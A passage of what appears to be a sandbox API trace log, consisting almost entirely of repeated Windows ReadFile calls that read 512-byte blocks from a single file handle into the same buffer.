lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.081] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.081] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.081] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.081] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.081] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.081] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.081] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.082] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.082] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.082] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.082] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.082] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.082] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.082] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.082] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.082] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.082] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.082] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.082] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.083] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.083] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.083] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.083] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.083] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.083] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.083] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.083] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.083] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.083] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.083] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.084] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.084] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.084] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.084] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.084] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.084] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.084] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.084] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.084] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.084] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.084] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.084] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.085] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.085] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.085] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.085] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.085] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.085] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.085] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.085] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.085] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.085] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.086] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.086] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.086] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.086] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.086] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.086] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.086] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.086] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.086] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.086] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.086] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.086] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.087] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.087] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.087] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.087] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.087] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.087] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.087] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.087] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.087] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.087] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.087] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.087] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.088] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.088] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.088] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.088] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.088] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.088] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.088] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.088] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.088] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.088] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.088] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.089] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.089] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.089] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.089] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.089] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.089] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.089] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.089] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.089] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.089] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.089] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.089] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, 